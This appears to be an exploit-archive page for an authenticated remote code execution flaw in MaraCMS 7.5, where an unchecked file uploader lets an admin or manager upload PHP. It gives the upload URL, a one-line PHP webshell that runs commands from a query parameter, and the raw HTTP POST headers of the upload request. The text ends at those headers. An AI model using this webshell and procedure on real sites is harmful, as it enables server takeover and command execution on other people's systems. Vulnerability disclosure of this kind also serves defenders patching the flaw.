Mara cms 7.5 remote code execution (authenticated) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2020-09-01 |
Type : webapps |
Platform : php
This exploit / vulnerability Mara cms 7.5 remote code execution (authenticated) is for educational purposes only and if it is used you will do on your own risk!
MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution.
In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'.
The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE.
2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'.
A request similar to the following will be made:
POST /codebase/handler.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268
Content-Length: 1282
Origin: http://localhost
Connection: close
Referer: http://localhost/codebase/dir.php?type=filenew
Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv
Upgrade-Insecure-Requests: 1